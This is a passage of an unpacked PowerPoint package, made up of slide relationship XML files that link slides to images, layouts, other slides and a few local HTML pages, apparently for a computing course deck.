<file path=ppt/slides/_rels/slide181.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83.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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xml"/><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3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.jpeg"/><Relationship Id="rId16"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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide184.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85.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190.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08.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide186.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slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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187.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188.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91.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192.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193.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94.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95.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6.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198.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9.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2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide244.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45.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01.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6.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image225.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide202.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28.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide79.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image227.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide203.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205.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06.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hyperlink" Target="../Content/ItCS/calendar.php-108.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide208.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209.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1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide200.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide317.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide193.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide259.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82.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide248.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide178.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide84.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide172.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide80.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide210.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211.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slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image238.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37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/BGPlay-master/run_bgplay.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image240.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide212.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13.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image241.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide214.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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image243.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide215.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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image245.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide216.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217.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9.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide218.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219.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2.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54.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide221.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55.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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53.png"/><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223.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slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image259.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224.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3.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image262.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image261.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide225.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3.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image262.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image261.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide226.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7.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8.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9.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68.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23.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69.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide231.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0.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide232.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33.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34.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236.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73.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide237.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4.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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75.jpeg"/><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239.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76.jpeg"/><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s>
</file>

<file path=ppt/slides/_rels/slide241.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image" Target="../media/image280.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide242.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243.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244.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide400.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide245.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide245.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide244.xml"/><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slide" Target="slide374.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide315.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide246.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide259.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide288.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide248.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide257.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide282.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide245.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide247.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide311.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide255.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide275.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide252.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide305.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide268.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide250.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide263.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide298.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide247.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slide" Target="slide246.xm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24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285.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image284.png"/></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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide43.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide250.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1.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slide" Target="slide246.xm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252.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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image287.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide25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293.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image292.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide255.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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><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297.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image296.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image295.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide257.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8.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300.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image299.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25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422.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image" Target="../media/image301.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide261.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image304.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image303.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide262.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image305.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26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4.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309.png"/><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308.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image307.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image306.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide265.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image311.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide266.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image313.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image312.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide267.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image314.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26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9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image315.png"/><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316.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422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide29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image" Target="../media/image319.png"/><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322.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image320.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide271.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image323.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image326.png"/><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318.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image325.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image324.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide272.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image328.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image332.gif"/><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330.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image329.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide274.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slide" Target="slide246.xm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275.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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image334.png"/><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s>
</file>

<file path=ppt/slides/_rels/slide277.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image338.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image342.png"/><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image" Target="../media/image339.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide278.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slide" Target="slide246.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image344.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide279.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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422.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image345.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image349.gif"/><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348.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image347.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image346.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide281.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image351.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xm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282.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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image352.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image356.png"/><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355.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide284.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image357.bmp"/><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360.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image359.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image358.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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slide" Target="slide246.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image362.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide286.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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7.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365.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image364.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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368.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36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290.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image369.png"/><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372.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image371.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image370.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide291.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slide" Target="slide246.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image374.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide292.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377.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image376.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide293.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image378.bmp"/><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380.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image379.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide294.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slide" Target="slide246.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image381.bmp"/><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383.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image382.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide297.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image384.png"/><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387.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image386.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image385.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image388.bmp"/><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390.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image389.bmp"/></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422.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422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide300.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide301.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slide" Target="slide246.xm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302.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slide" Target="slide246.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide303.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image388.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image400.bmp"/><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399.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image398.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image397.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide305.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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image406.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image401.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image405.bmp"/><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404.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image403.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image402.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide307.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
